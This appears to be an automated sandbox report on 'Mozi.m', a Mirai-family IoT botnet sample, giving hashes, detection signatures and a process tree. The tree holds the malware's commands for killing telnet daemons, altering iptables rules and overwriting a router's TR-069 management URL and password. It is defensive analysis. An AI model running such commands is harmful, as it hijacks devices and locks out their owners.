Loading ...

Play interactive tourEdit tour

Analysis Report Mozi.m

Overview

General Information

Sample Name:Mozi.m
Analysis ID:294799
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "mkdir" command used to create folders
Executes the "mktemp" command used to create a temporary unique file name
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • dash New Fork (PID: 3191, Parent: 3190)
  • sed (PID: 3191, Parent: 3190, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3192, Parent: 3190)
  • sort (PID: 3192, Parent: 3190, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3193, Parent: 2523)
  • sleep (PID: 3193, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3219, Parent: 3218)
  • sed (PID: 3219, Parent: 3218, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3220, Parent: 3218)
  • sort (PID: 3220, Parent: 3218, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3225, Parent: 2523)
  • sleep (PID: 3225, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3247, Parent: 3246)
  • sed (PID: 3247, Parent: 3246, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3248, Parent: 3246)
  • sort (PID: 3248, Parent: 3246, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3249, Parent: 2523)
  • sleep (PID: 3249, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3275, Parent: 3274)
  • sed (PID: 3275, Parent: 3274, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3276, Parent: 3274)
  • sort (PID: 3276, Parent: 3274, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3280, Parent: 2523)
  • sleep (PID: 3280, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3303, Parent: 3302)
  • sed (PID: 3303, Parent: 3302, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3304, Parent: 3302)
  • sort (PID: 3304, Parent: 3302, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3305, Parent: 2523)
  • sleep (PID: 3305, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3331, Parent: 3330)
  • sed (PID: 3331, Parent: 3330, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3332, Parent: 3330)
  • sort (PID: 3332, Parent: 3330, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3333, Parent: 2523)
  • sleep (PID: 3333, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3359, Parent: 3358)
  • sed (PID: 3359, Parent: 3358, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3360, Parent: 3358)
  • sort (PID: 3360, Parent: 3358, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3369, Parent: 2523)
  • sleep (PID: 3369, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3387, Parent: 3386)
  • sed (PID: 3387, Parent: 3386, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3388, Parent: 3386)
  • sort (PID: 3388, Parent: 3386, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3397, Parent: 2523)
  • sleep (PID: 3397, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3415, Parent: 3414)
  • sed (PID: 3415, Parent: 3414, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3416, Parent: 3414)
  • sort (PID: 3416, Parent: 3414, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3425, Parent: 2523)
  • sleep (PID: 3425, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3443, Parent: 3442)
  • sed (PID: 3443, Parent: 3442, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3444, Parent: 3442)
  • sort (PID: 3444, Parent: 3442, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3453, Parent: 2523)
  • sleep (PID: 3453, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • Mozi.m (PID: 3480, Parent: 3133, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/Mozi.m
    • Mozi.m New Fork (PID: 3490, Parent: 3480)
      • Mozi.m New Fork (PID: 3492, Parent: 3490)
        • Mozi.m New Fork (PID: 3494, Parent: 3492)
        • sh (PID: 3494, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 3496, Parent: 3494)
          • killall (PID: 3496, Parent: 3494, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m New Fork (PID: 3513, Parent: 3492)
        • Mozi.m New Fork (PID: 3514, Parent: 3492)
        • Mozi.m New Fork (PID: 3515, Parent: 3492)
          • Mozi.m New Fork (PID: 3688, Parent: 3515)
          • sh (PID: 3688, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3690, Parent: 3688)
            • iptables (PID: 3690, Parent: 3688, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              • iptables New Fork (PID: 3691, Parent: 3690)
              • modprobe (PID: 3691, Parent: 3690, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • Mozi.m New Fork (PID: 3722, Parent: 3515)
          • sh (PID: 3722, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3725, Parent: 3722)
            • iptables (PID: 3725, Parent: 3722, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3733, Parent: 3515)
          • sh (PID: 3733, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3739, Parent: 3733)
            • iptables (PID: 3739, Parent: 3733, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3770, Parent: 3515)
          • sh (PID: 3770, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT"
            • sh New Fork (PID: 3772, Parent: 3770)
            • iptables (PID: 3772, Parent: 3770, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3776, Parent: 3515)
          • sh (PID: 3776, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 51746 -j ACCEPT"
            • sh New Fork (PID: 3783, Parent: 3776)
            • iptables (PID: 3783, Parent: 3776, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3803, Parent: 3515)
          • sh (PID: 3803, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT"
            • sh New Fork (PID: 3808, Parent: 3803)
            • iptables (PID: 3808, Parent: 3803, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3811, Parent: 3515)
          • sh (PID: 3811, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT"
            • sh New Fork (PID: 3813, Parent: 3811)
            • iptables (PID: 3813, Parent: 3811, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
          • Mozi.m New Fork (PID: 3815, Parent: 3515)
          • sh (PID: 3815, Parent: 3515, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT"
            • sh New Fork (PID: 3822, Parent: 3815)
            • iptables (PID: 3822, Parent: 3815, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
        • Mozi.m New Fork (PID: 3678, Parent: 3492)
        • Mozi.m New Fork (PID: 3684, Parent: 3492)
        • Mozi.m New Fork (PID: 3686, Parent: 3492)
        • Mozi.m New Fork (PID: 4027, Parent: 3492)
        • sh (PID: 4027, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4029, Parent: 4027)
          • iptables (PID: 4029, Parent: 4027, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4030, Parent: 3492)
        • sh (PID: 4030, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4032, Parent: 4030)
          • iptables (PID: 4032, Parent: 4030, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4033, Parent: 3492)
        • sh (PID: 4033, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4036, Parent: 4033)
          • iptables (PID: 4036, Parent: 4033, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m New Fork (PID: 4044, Parent: 3492)
        • sh (PID: 4044, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4055, Parent: 4044)
          • iptables (PID: 4055, Parent: 4044, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m New Fork (PID: 4076, Parent: 3492)
        • sh (PID: 4076, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m New Fork (PID: 4087, Parent: 3492)
        • sh (PID: 4087, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m New Fork (PID: 4100, Parent: 3492)
        • sh (PID: 4100, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4107, Parent: 4100)
          • iptables (PID: 4107, Parent: 4100, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4127, Parent: 3492)
        • sh (PID: 4127, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4137, Parent: 4127)
          • iptables (PID: 4137, Parent: 4127, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m New Fork (PID: 4154, Parent: 3492)
        • sh (PID: 4154, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4162, Parent: 4154)
          • iptables (PID: 4162, Parent: 4154, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m New Fork (PID: 4175, Parent: 3492)
        • sh (PID: 4175, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4180, Parent: 4175)
          • iptables (PID: 4180, Parent: 4175, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4192, Parent: 3492)
        • sh (PID: 4192, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4199, Parent: 4192)
          • iptables (PID: 4199, Parent: 4192, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m New Fork (PID: 4207, Parent: 3492)
        • sh (PID: 4207, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 4216, Parent: 4207)
          • iptables (PID: 4216, Parent: 4207, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m New Fork (PID: 4235, Parent: 3492)
        • sh (PID: 4235, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 4239, Parent: 4235)
          • iptables (PID: 4239, Parent: 4235, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m New Fork (PID: 4241, Parent: 3492)
        • sh (PID: 4241, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 4251, Parent: 4241)
          • iptables (PID: 4251, Parent: 4241, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m New Fork (PID: 4269, Parent: 3492)
        • sh (PID: 4269, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 4275, Parent: 4269)
          • iptables (PID: 4275, Parent: 4269, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m New Fork (PID: 4279, Parent: 3492)
        • sh (PID: 4279, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 4285, Parent: 4279)
          • iptables (PID: 4285, Parent: 4279, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m New Fork (PID: 4303, Parent: 3492)
        • sh (PID: 4303, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 4314, Parent: 4303)
          • iptables (PID: 4314, Parent: 4303, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m New Fork (PID: 4321, Parent: 3492)
        • sh (PID: 4321, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 4328, Parent: 4321)
          • iptables (PID: 4328, Parent: 4321, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m New Fork (PID: 4351, Parent: 3492)
        • sh (PID: 4351, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4353, Parent: 4351)
          • iptables (PID: 4353, Parent: 4351, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4357, Parent: 3492)
        • sh (PID: 4357, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4364, Parent: 4357)
          • iptables (PID: 4364, Parent: 4357, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4386, Parent: 3492)
        • sh (PID: 4386, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4390, Parent: 4386)
          • iptables (PID: 4390, Parent: 4386, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4397, Parent: 3492)
        • sh (PID: 4397, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT"
          • sh New Fork (PID: 4408, Parent: 4397)
          • iptables (PID: 4408, Parent: 4397, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4426, Parent: 3492)
        • sh (PID: 4426, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 28296 -j ACCEPT"
          • sh New Fork (PID: 4429, Parent: 4426)
          • iptables (PID: 4429, Parent: 4426, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4433, Parent: 3492)
        • sh (PID: 4433, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT"
          • sh New Fork (PID: 4440, Parent: 4433)
          • iptables (PID: 4440, Parent: 4433, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4462, Parent: 3492)
        • sh (PID: 4462, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT"
          • sh New Fork (PID: 4467, Parent: 4462)
          • iptables (PID: 4467, Parent: 4462, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
        • Mozi.m New Fork (PID: 4471, Parent: 3492)
        • sh (PID: 4471, Parent: 3492, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT"
          • sh New Fork (PID: 4478, Parent: 4471)
          • iptables (PID: 4478, Parent: 4471, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
  • dash New Fork (PID: 3520, Parent: 3519)
  • sed (PID: 3520, Parent: 3519, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3521, Parent: 3519)
  • sort (PID: 3521, Parent: 3519, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3534, Parent: 2523)
  • sleep (PID: 3534, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3548, Parent: 3547)
  • sed (PID: 3548, Parent: 3547, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3549, Parent: 3547)
  • sort (PID: 3549, Parent: 3547, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3558, Parent: 2523)
  • sleep (PID: 3558, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3576, Parent: 3575)
  • sed (PID: 3576, Parent: 3575, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3577, Parent: 3575)
  • sort (PID: 3577, Parent: 3575, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3586, Parent: 2523)
  • sleep (PID: 3586, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3604, Parent: 3603)
  • sed (PID: 3604, Parent: 3603, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DNS=/ { s/^DNS=/nameserver /; p}" /run/systemd/netif/state /run/systemd/netif/leases/*
  • dash New Fork (PID: 3605, Parent: 3603)
  • sort (PID: 3605, Parent: 3603, MD5: fb4c334af5810c835b37ec2ec14a35bd) Arguments: sort -u
  • dash New Fork (PID: 3614, Parent: 2523)
  • sleep (PID: 3614, Parent: 2523, MD5: e9887f1d8cae3dc50b4cbac09435a162) Arguments: sleep 1
  • dash New Fork (PID: 3631, Parent: 2523)
  • sed (PID: 3631, Parent: 2523, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -n "/^DOMAINS=/ { s/^.*=/search /; p}" /run/systemd/netif/state
  • dash New Fork (PID: 3632, Parent: 2523)
  • resolvconf (PID: 3632, Parent: 2523, MD5: 4e4ff2bfda7a6d18405a462937b63a2e) Arguments: /bin/sh /sbin/resolvconf -a networkd
    • mkdir (PID: 3646, Parent: 3632, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /run/resolvconf/interface
    • resolvconf New Fork (PID: 3651, Parent: 3632)
      • sed (PID: 3652, Parent: 3651, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -e s/#.*$// -e s/[[:blank:]]\\+$// -e s/^[[:blank:]]\\+// -e "s/[[:blank:]]\\+/ /g" -e "/^nameserver/!b ENDOFCYCLE" -e "s/$/ /" -e "s/\\([:. ]\\)0\\+/\\10/g" -e "s/\\([:. ]\\)0\\([123456789abcdefABCDEF][[:xdigit:]]*\\)/\\1\\2/g" -e "/::/b ENDOFCYCLE; s/ \\(0[: ]\\)\\+/ ::/" -e "/::/b ENDOFCYCLE; s/:\\(0[: ]\\)\\+/::/" -e ": ENDOFCYCLE" -
      • sed (PID: 3653, Parent: 3651, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -e s/[[:blank:]]\\+$// -e /^$/d
  • dash New Fork (PID: 3865, Parent: 2079)
  • mkdir (PID: 3865, Parent: 2079, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /home/user/.cache/logrotate
  • dash New Fork (PID: 3874, Parent: 2079)
  • mkdir (PID: 3874, Parent: 2079, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /home/user/.cache/upstart
  • dash New Fork (PID: 3875, Parent: 2079)
  • egrep (PID: 3875, Parent: 2079, MD5: ef55d1537377114cc24cdc398fbdd930) Arguments: /bin/sh /bin/egrep [^[:print:]] /home/user/.cache/logrotate/status
  • grep (PID: 3875, Parent: 2079, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E [^[:print:]] /home/user/.cache/logrotate/status
  • dash New Fork (PID: 3928, Parent: 2079)
  • mktemp (PID: 3928, Parent: 2079, MD5: 91cf2e2a84f3b49fdecdd8b631902009) Arguments: mktemp
  • dash New Fork (PID: 3937, Parent: 2079)
  • cat (PID: 3937, Parent: 2079, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat
  • dash New Fork (PID: 3938, Parent: 2079)
  • logrotate (PID: 3938, Parent: 2079, MD5: d0eaf9942936032d217478b93e9cd4b1) Arguments: logrotate -s /home/user/.cache/logrotate/status /tmp/tmp.vHWsTctARt
    • gzip (PID: 3939, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3950, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3973, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3974, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3975, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
